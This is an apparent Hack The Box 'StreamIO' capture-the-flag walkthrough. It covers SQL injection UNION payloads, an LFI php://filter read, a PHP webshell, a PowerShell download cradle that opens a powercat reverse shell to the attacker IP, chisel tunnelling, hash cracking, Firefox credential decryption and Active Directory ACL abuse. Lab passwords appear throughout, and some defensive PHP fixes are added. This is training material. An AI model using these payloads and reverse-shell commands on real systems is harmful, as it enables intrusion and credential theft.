HTB — StreamIO
SQLi on login page, LFI reveals PHP source. MSSQL xp_cmdshell for shell. Firefox DPAPI credential decryption leads to Domain Admin via ADCS.
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.158
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-31 20:43 EST
Stats: 0:02:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 84.21% done; ETC: 20:46 (0:00:10 remaining)
Nmap scan report for 10.10.11.158
Host is up (0.021s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-01 08:45:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-02-01T08:47:04+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-02-01T08:46:25
|_ start_date: N/A
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 19.63 ms 10.10.14.1
2 19.73 ms 10.10.11.158
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.14 seconds

80
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server

445
smbclient -N -L \\\\10.10.11.158
session setup failed: NT_STATUS_ACCESS_DENIED
smbclient -L \\\\10.10.11.158 -U 'Guest'
Password for [WORKGROUP\Guest]:
session setup failed: NT_STATUS_ACCOUNT_DISABLED

dir search
watch.streamio.htb
feroxbuster -u https://watch.streamio.htb -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://watch.streamio.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 72l 112w 875c https://watch.streamio.htb/static/css/index.css
200 GET 192l 1006w 82931c https://watch.streamio.htb/static/icon.png
200 GET 136l 295w 22042c https://watch.streamio.htb/static/logo.png
200 GET 78l 245w 2829c https://watch.streamio.htb/
301 GET 2l 10w 157c https://watch.streamio.htb/static => https://watch.streamio.htb/static/
301 GET 2l 10w 161c https://watch.streamio.htb/static/css => https://watch.streamio.htb/static/css/
301 GET 2l 10w 160c https://watch.streamio.htb/static/js => https://watch.streamio.htb/static/js/
403 GET 29l 92w 1233c https://watch.streamio.htb/static/
403 GET 29l 92w 1233c https://watch.streamio.htb/static/css/
301 GET 2l 10w 161c https://watch.streamio.htb/static/CSS => https://watch.streamio.htb/static/CSS/
301 GET 2l 10w 160c https://watch.streamio.htb/static/JS => https://watch.streamio.htb/static/JS/
301 GET 2l 10w 160c https://watch.streamio.htb/static/Js => https://watch.streamio.htb/static/Js/
301 GET 2l 10w 161c https://watch.streamio.htb/static/Css => https://watch.streamio.htb/static/Css/
[#>------------------] - 35s 19962/240031 6m found:13 errors:0
🚨 Caught ctrl+c 🚨 saving scan state to ferox-https_watch_streamio_htb-1738375083.state ...
[#>------------------] - 35s 19976/240031 6m found:13 errors:0
[##>-----------------] - 35s 3102/30000 88/s https://watch.streamio.htb/
[#>------------------] - 35s 2921/30000 84/s https://watch.streamio.htb/static/
[#>------------------] - 35s 2901/30000 83/s https://watch.streamio.htb/static/css/
[#>------------------] - 34s 2799/30000 83/s https://watch.streamio.htb/static/js/
[#>------------------] - 30s 2449/30000 81/s https://watch.streamio.htb/static/CSS/
[#>------------------] - 25s 2099/30000 85/s https://watch.streamio.htb/static/JS/
[#>------------------] - 23s 1819/30000 79/s https://watch.streamio.htb/static/Js/
[#>------------------] - 22s 1799/30000 81/s https://watch.streamio.htb/static/Css/

streamio.htb
feroxbuster -u https://streamio.htb/ -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://streamio.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 151c https://streamio.htb/images => https://streamio.htb/images/
301 GET 2l 10w 147c https://streamio.htb/js => https://streamio.htb/js/
301 GET 2l 10w 148c https://streamio.htb/css => https://streamio.htb/css/
301 GET 2l 10w 150c https://streamio.htb/admin => https://streamio.htb/admin/
200 GET 192l 1006w 82931c https://streamio.htb/images/icon.png
200 GET 51l 213w 19329c https://streamio.htb/images/client.jpg
200 GET 101l 173w 1663c https://streamio.htb/css/responsive.css
200 GET 5l 374w 21257c https://streamio.htb/js/popper.min.js
200 GET 863l 1698w 16966c https://streamio.htb/css/style.css
200 GET 913l 5479w 420833c https://streamio.htb/images/about-img.png
200 GET 206l 430w 6434c https://streamio.htb/contact.php
200 GET 367l 1995w 166220c https://streamio.htb/images/contact-img.png
200 GET 111l 269w 4145c https://streamio.htb/login.php
200 GET 231l 571w 7825c https://streamio.htb/about.php
200 GET 2l 1276w 88145c https://streamio.htb/js/jquery-3.4.1.min.js
200 GET 395l 915w 13497c https://streamio.htb/index.php
200 GET 395l 915w 13497c https://streamio.htb/

streamio.htb/admin
feroxbuster --url https://streamio.htb/admin/ -x php,txt,pdf,asp,aspx,py,js,jsp,yml,yaml,zip,rb,pl,doc,docx,xls,xlsx,conf,sql -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://streamio.htb/admin/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt, pdf, asp, aspx, py, js, jsp, yml, yaml, zip, rb, pl, doc, docx, xls, xlsx, conf, sql]
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 1l 1w 18c https://streamio.htb/admin/
301 GET 2l 10w 157c https://streamio.htb/admin/images => https://streamio.htb/admin/images/
301 GET 2l 10w 154c https://streamio.htb/admin/css => https://streamio.htb/admin/css/
301 GET 2l 10w 153c https://streamio.htb/admin/js => https://streamio.htb/admin/js/
301 GET 2l 10w 157c https://streamio.htb/admin/Images => https://streamio.htb/admin/Images/
403 GET 1l 1w 18c https://streamio.htb/admin/index.php
301 GET 2l 10w 156c https://streamio.htb/admin/fonts => https://streamio.htb/admin/fonts/
301 GET 2l 10w 154c https://streamio.htb/admin/CSS => https://streamio.htb/admin/CSS/
200 GET 8l 22w 215c https://streamio.htb/admin/js/custom.js
301 GET 2l 10w 153c https://streamio.htb/admin/JS => https://streamio.htb/admin/JS/
301 GET 2l 10w 153c https://streamio.htb/admin/Js => https://streamio.htb/admin/Js/
301 GET 2l 10w 154c https://streamio.htb/admin/Css => https://streamio.htb/admin/Css/
200 GET 2l 6w 58c https://streamio.htb/admin/master.php
200 GET 8l 22w 215c https://streamio.htb/admin/JS/custom.js
SQL injection

q=test' UNION SELECT 1,table_name,3,4,5,6 FROM streamio.INFORMATION_SCHEMA.TABLES-- -

determine the column names to extract

q=test' UNION SELECT 1,COLUMN_NAME,3,4,5,6 FROM INFORMATION_SCHEMA.COLUMNS where table_name='users'-- -

extracting the username field

q=test' UNION SELECT 1,username,3,4,5,6 FROM users-- -
users
admin
Alexendra:##123a8j8w5123##
Austin
Barbra
Barry
Baxter
Bruno
Carmon
Clara
Diablo
Garfield
Gloria
James
Juliette
Lauren
Lenord
Lucifer
Michelle
Oliver
Robert
Robin
Sabrina
Samantha
Stan
Thane
Theodore
Victor
Victoria
William
yoshihide

hashes
0049ac57...
08344b85...:##123a8j8w5123##
083ffae9...
0cfaaaaf...
1c2b3d82...
22ee2183...
2a4e2cf2...:$monique$1991$
35394484...
3577c47e...:highschoolmusical
38446352...
39615488...
54c88b2d...:$hadoW
665a50ac...:paddpadd
6dcd8774...:$3xybitch
7df45a9e...
8097cedd...
925e5408...
b22abb47...:!5psycho8!
b779ba15...:66boysandgirls..
b83439b1...:!?Love?!123
bf55e15b...
c6600604...
d62be0dc...
dc332fb5...
ec33265e...
ee0b8a09...:physics69i
ef8f3d30...:%$clara
f03b910e...
f87d3c0d...:!!sabrina$
fd78db29...

passwords
##123a8j8w5123##
$monique$1991$
highschoolmusical
$hadoW
paddpadd
$3xybitch
!5psycho8!
66boysandgirls..
!?Love?!123
physics69i
%$clara
!!sabrina$

admin:0049ac57...
Alexendra:08344b85...:##123a8j8w5123##
Austin:083ffae9...
Barbra:0cfaaaaf...
Barry:1c2b3d82...
Baxter:22ee2183...
Bruno:2a4e2cf2...:$monique$1991$
Carmon:35394484...
Clara:3577c47e...:highschoolmusical
Diablo:38446352...
Garfield:39615488...
Gloria:54c88b2d...:$hadoW
James:665a50ac...:paddpadd
Juliette:6dcd8774...:$3xybitch
Lauren:7df45a9e...
Lenord:8097cedd...
Lucifer:925e5408...
Michelle:b22abb47...:!5psycho8!
Oliver:b779ba15...:66boysandgirls..
Robert:b83439b1...:!?Love?!123
Robin:bf55e15b...
Sabrina:c6600604...
Samantha:d62be0dc...
Stan:dc332fb5...
Thane:ec33265e...
Theodore:ee0b8a09...:physics69i
Victor:ef8f3d30...:%$clara
Victoria:f03b910e...
William:f87d3c0d...:!!sabrina$
yoshihide:fd78db29...

creds
yoshihide:66boysandgirls..

/admin

ffuf parameters
ffuf -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u https://streamio.htb/admin/?FUZZ=key -H 'Cookie: PHPSESSID=d67rk5rk42n33ehhjm38b0hknu' -fs 1678
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://streamio.htb/admin/?FUZZ=key
:: Wordlist : FUZZ: /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt
:: Header : Cookie: PHPSESSID=d67rk5rk42n33ehhjm38b0hknu
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 1678
________________________________________________
debug [Status: 200, Size: 1712, Words: 90, Lines: 50, Duration: 32ms]
movie [Status: 200, Size: 320235, Words: 15986, Lines: 10791, Duration: 45ms]
staff [Status: 200, Size: 12484, Words: 1784, Lines: 399, Duration: 26ms]
user [Status: 200, Size: 2073, Words: 146, Lines: 63, Duration: 59ms]
:: Progress: [6453/6453] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:12] :: Errors: 0 ::

LFI
https://streamio.htb/admin/?debug=/windows/win.ini
read with php filter
GET /admin/?debug=php://filter/read=convert.base64-encode/resource=master.php HTTP/2
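The two requests above work because whatever is passed in debug ends up in an include. The following is an added example (not StreamIO's own admin/index.php) of the same page-selector feature written so that neither a filesystem path nor a stream wrapper can reach include(); it assumes the original did something like include($_GET['debug']), and the file names under pages/ are hypothetical (the keys match the parameters ffuf found).

```php
<?php
// Added example, not StreamIO's admin/index.php. Assumption: the original
// admin page passed ?debug= straight to include(), which is why
// ?debug=/windows/win.ini and php://filter/... are honoured above.
// Fix: the request selects a key in a fixed map; no user-supplied path or
// stream wrapper ever reaches include().

declare(strict_types=1);

session_start();
if (!isset($_SESSION['admin'])) {
    header('HTTP/1.1 403 Forbidden');
    die('<h1>FORBIDDEN</h1>');
}

const PAGE_ROOT = __DIR__ . '/pages';

// Keys are the parameters ffuf found (movie, staff, user); the file names
// under PAGE_ROOT are hypothetical.
const PAGES = [
    'movie' => 'movie.php',
    'staff' => 'staff.php',
    'user'  => 'user.php',
];

function resolvePage(?string $key): ?string
{
    if ($key === null || !array_key_exists($key, PAGES)) {
        return null;
    }
    $root = realpath(PAGE_ROOT);
    $path = realpath(PAGE_ROOT . '/' . PAGES[$key]);
    // Defence in depth: even a bad PAGES entry cannot escape PAGE_ROOT, and
    // php://, data:// or UNC paths never survive realpath() here.
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

$requested = isset($_GET['page']) ? (string)$_GET['page'] : null;
$file = resolvePage($requested);
if ($file === null) {
    // Log the rejected value: repeated "php://filter" or "../" here is the
    // signal a defender wants to alert on.
    error_log(sprintf('admin: rejected page selector %s from %s',
        var_export($requested, true), $_SERVER['REMOTE_ADDR'] ?? '?'));
    http_response_code(404);
    exit('not found');
}
require $file;
```

With this shape the value in the URL is only ever a lookup key, so a request such as ?page=php://filter/... is logged and answered with a 404 instead of being evaluated by the stream layer.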


echo '<?php system($_GET["cmd"]); ?>' > shell.php
python3 -m http.server 80
- a PHP webshell, because the target is already running PHP
shell.php
system('whoami');
rev shell
shell.php
system("powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.13:8000/powercat.ps1');powercat -c 10.10.14.13 -p 443 -e cmd");
- serve powercat
python3 -m http.server 8000
- trigger execution

nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.158] 61921
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\streamio.htb\admin>whoami
whoami
streamio\yoshihide

cp /usr/share/webshells/aspx/cmdasp.aspx ./
C:\inetpub\wwwroot>certutil.exe -f -urlcache -split http://10.10.14.13:8001/cmdasp.aspx cmdasp.aspx
C:\inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is A381-2B63
Directory of C:\inetpub\wwwroot
02/01/2025 04:51 PM <DIR> .
02/01/2025 04:51 PM <DIR> ..
02/22/2022 02:48 AM <DIR> aspnet_client
02/01/2025 04:51 PM 1,400 cmdasp.aspx
02/22/2022 02:46 AM 703 iisstart.htm
02/22/2022 02:46 AM 99,710 iisstart.png
02/01/2025 07:28 AM 8 test.txt
4 File(s) 101,821 bytes
3 Dir(s) 7,033,192,448 bytes free

search.php
C:\inetpub\watch.streamio.htb>type search.php
type search.php
<?php
$search = strtolower($_POST['q']);
// sqlmap choker
$shitwords = ["/WAITFOR/i", "/vkBQ/i", "/CHARINDEX/i", "/ALL/i", "/SQUARE/i", "/ORDER/i", "/IF/i","/DELAY/i", "/NULL/i", "/UNICODE/i","/0x/i", "/\*\*/", "/-- [a-z0-9]{4}/i", "ifnull/i", "/ or /i"];
foreach ($shitwords as $shitword) {
if (preg_match( $shitword, $search )) {
header("Location: https://watch.streamio.htb/blocked.php");
die("blocked");
}
}
# Query section
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
if (!isset($_POST['q']))
{
creds
db_user:B1@hB1@hB1@h
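search.php above tries to stop injection with a regex blocklist ("sqlmap choker") and then builds the query from $_POST['q'] directly, with the database password sitting in the web root where the LFI could read it. Below is an added example, not StreamIO's code, of the same handler with those two defects removed: a parameterised query via the sqlsrv driver and the secret taken from the environment. The page never shows the actual SELECT, so the movies table and its columns (id, movie, year, imdb) are assumptions.

```php
<?php
// Added example, not StreamIO's search.php. Same job as the handler above
// (POST q, search the catalogue) with the two real defects removed:
//  - the regex blocklist is gone; the query is parameterised, so q may
//    contain quotes, UNION or comment sequences and they remain data;
//  - the DB password is no longer in the web root where the LFI could read it.
// Assumptions (hypothetical, the page does not show the query): a movies
// table with columns id, movie, year, imdb; the secret comes from the
// environment.

declare(strict_types=1);

function connectStreamio()
{
    $pwd = getenv('STREAMIO_DB_PWD');
    if ($pwd === false) {
        http_response_code(500);
        exit('search unavailable');
    }
    $handle = sqlsrv_connect('(local)',
        ["Database" => "STREAMIO", "UID" => "db_user", "PWD" => $pwd]);
    if ($handle === false) {
        error_log(print_r(sqlsrv_errors(), true)); // server-side only, never echoed
        http_response_code(500);
        exit('search unavailable');
    }
    return $handle;
}

function searchMovies($handle, string $term): array
{
    // Escape LIKE metacharacters so %, _ and [ in the term match literally.
    $escaped = str_replace(['\\', '%', '_', '['], ['\\\\', '\\%', '\\_', '\\['], $term);
    $sql = "SELECT TOP 50 id, movie, year, imdb FROM movies "
         . "WHERE movie LIKE ? ESCAPE '\\' ORDER BY year DESC";
    // The value travels as a bound parameter, separate from the SQL text.
    $stmt = sqlsrv_query($handle, $sql, ['%' . $escaped . '%']);
    if ($stmt === false) {
        error_log(print_r(sqlsrv_errors(), true));
        return [];
    }
    $rows = [];
    while ($row = sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC)) {
        $rows[] = $row;
    }
    sqlsrv_free_stmt($stmt);
    return $rows;
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !isset($_POST['q'])) {
    http_response_code(400);
    exit('missing q');
}
$term = trim((string)$_POST['q']);
if ($term === '' || strlen($term) > 100) {
    http_response_code(400);
    exit('bad query');
}
$handle = connectStreamio();
foreach (searchMovies($handle, $term) as $row) {
    // Output-encode every field so a stored title cannot become script.
    printf("<p>%s (%d)</p>\n",
        htmlspecialchars((string)$row['movie'], ENT_QUOTES, 'UTF-8'), (int)$row['year']);
}
sqlsrv_close($handle);
```

Note that the blocklist is simply dropped rather than extended: once the term is a bound parameter there is nothing for a keyword filter to protect, and the length check exists only to bound work on the database side.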
index.php
C:\inetpub\streamio.htb\admin>type index.php
type index.php
<?php
define('included',true);
session_start();
if(!isset($_SESSION['admin']))
{
header('HTTP/1.1 403 Forbidden');
die("<h1>FORBIDDEN</h1>");
}
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);

creds
db_admin:B1@hx31234567890
local port forwarding to 1433 MSSQL
C:\inetpub>certutil.exe -f -urlcache -split http://10.10.14.13:8001/chisel.exe chisel.exe
./chisel server --reverse --port 1234
C:\inetpub>.\chisel.exe client 10.10.14.13:1234 R:1433:127.0.0.1:1433
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 652
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 3452

mssqlclient.py db_admin@127.0.0.1
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC): Line 1: Changed database context to 'master'.
[*] INFO(DC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (db_admin db_admin@master)> SELECT name FROM master.dbo.sysdatabases
name
---------------
master
tempdb
model
msdb
STREAMIO
streamio_backup
SQL (db_admin db_admin@master)> USE streamio_backup
SQL (db_admin db_admin@master)> SELECT table_name FROM streamio_backup.INFORMATION_SCHEMA.TABLES
table_name
----------
movies
users
SQL (db_admin db_admin@streamio_backup)> select * from users;
id username password
-- -------------------------------------------------- --------------------------------------------------
1 nikk37 389d14cb...
2 yoshihide b779ba15...
3 James c6600604...
4 Theodore 925e5408...
5 Samantha 083ffae9...
6 Lauren 08344b85...
7 William d62be0dc...
8 Sabrina f87d3c0d...

hashcat
hashcat -m 0 '389d14cb...' /usr/share/wordlists/rockyou.txt
389d14cb...:get_dem_girls2@yahoo.com

creds
nikk37:get_dem_girls2@yahoo.com
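hashcat -m 0 is unsalted MD5: every row in that users table falls to a wordlist in seconds, and nikk37's password is then reused on SMB and WinRM. As an added example (not StreamIO's login code), this is how the same table can be moved to password_hash() without a forced reset, verifying legacy MD5 rows once and rewriting them on the next successful login. It assumes users(id, username, password) as in streamio_backup and a sqlsrv handle like the one in index.php.

```php
<?php
// Added example, not StreamIO's login code. The users table stores unsalted
// MD5, which is why hashcat -m 0 against rockyou recovered nikk37's password.
// This verifier accepts the legacy MD5 rows once, then replaces them with
// password_hash() output so the next dump is not crackable by wordlist.
// Assumes users(id, username, password) and a sqlsrv connection handle.

declare(strict_types=1);

function verifyAndUpgrade($handle, string $username, string $password): bool
{
    $stmt = sqlsrv_query($handle,
        "SELECT id, password FROM users WHERE username = ?", [$username]);
    $row = ($stmt !== false) ? sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC) : null;
    if (!$row) {
        // Do a verify anyway so unknown users cost the same time as bad passwords.
        password_verify($password, '$2y$10$' . str_repeat('0', 53));
        return false;
    }

    $stored = (string)$row['password'];
    $legacy = preg_match('/^[0-9a-f]{32}$/i', $stored) === 1; // old unsalted MD5 row
    $ok = $legacy
        ? hash_equals(strtolower($stored), md5($password))   // constant-time compare
        : password_verify($password, $stored);
    if (!$ok) {
        return false;
    }

    // Migrate: legacy rows, and bcrypt rows whose cost is below the current default.
    if ($legacy || password_needs_rehash($stored, PASSWORD_DEFAULT)) {
        $new = password_hash($password, PASSWORD_DEFAULT);
        sqlsrv_query($handle, "UPDATE users SET password = ? WHERE id = ?",
            [$new, (int)$row['id']]);
    }
    return true;
}

function registerUser($handle, string $username, string $password): bool
{
    if (strlen($password) < 12) {
        return false; // minimum length; add a breached-password check in production
    }
    $hash = password_hash($password, PASSWORD_DEFAULT);
    return sqlsrv_query($handle,
        "INSERT INTO users (username, password) VALUES (?, ?)", [$username, $hash]) !== false;
}
```

After one login cycle the 32-hex-character rows are gone, so a future copy of the table (as in streamio_backup here) yields salted bcrypt that a rockyou run does not recover in any useful time.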
nxc smb 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com'
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com

nxc winrm 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com'
WINRM 10.10.11.158 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:streamIO.htb)
WINRM 10.10.11.158 5985 DC [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com (Pwn3d!)

winrm
evil-winrm -i 10.10.11.158 -u 'nikk37' -p 'get_dem_girls2@yahoo.com'
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami
streamio\nikk37
*Evil-WinRM* PS C:\Users\nikk37\Desktop> cat user.txt
5823c6ed...

bloodhound
sudo bloodhound-python -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -ns 10.10.11.158 -d streamio.htb -c all
zip -r streamio.zip *.json

winpeas
*Evil-WinRM* PS C:\Users\nikk37> upload /opt/windows/winPEASx64.exe

firefox password
╔══════════╣ Looking for Firefox DBs
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Firefox credentials file exists at C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
╚ Run SharpWeb (https://github.com/djhohnstein/SharpWeb)

*Evil-WinRM* PS C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles> download br53rxeg.default-release
- copy firepwd.py into the directory where logins.json is
cp /opt/linux/firepwd/firepwd.py ./
python3 firepwd.py
...
...
...
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'

nxc smb 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com' --users
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com
SMB 10.10.11.158 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.158 445 DC Administrator 2025-02-02 01:21:50 33 Built-in account for administering the computer/domain
SMB 10.10.11.158 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.158 445 DC krbtgt 2022-02-22 09:45:13 0 Key Distribution Center Service Account
SMB 10.10.11.158 445 DC JDgodd 2022-02-22 09:56:42 3
SMB 10.10.11.158 445 DC Martin 2022-05-26 23:16:42 0
SMB 10.10.11.158 445 DC nikk37 2022-02-22 09:57:16 0
SMB 10.10.11.158 445 DC yoshihide 2022-02-22 09:57:24 0
SMB 10.10.11.158 445 DC [*] Enumerated 7 local users: streamIO

Administrator
JDgodd
Martin
nikk37
yoshihide

nxc smb 10.10.11.158 -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.11.158 445 DC [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r

creds
JDgodd:JDg0dd1s@d0p3cr3@t0r


WriteOwner (Core Staff group)
*Evil-WinRM* PS C:\Users\nikk37> upload /opt/windows/PowerView.ps1
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('STREAMIO\JDgodd', $SecPassword)
Set-DomainObjectOwner -Credential $Cred -Identity "Core Staff" -OwnerIdentity JDgodd
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -Rights WriteMembers

owneredit.py -action write -new-owner 'JDgodd' -target 'Core Staff' STREAMIO/JDgodd:JDg0dd1s@d0p3cr3@t0r -dc-ip 10.10.11.158
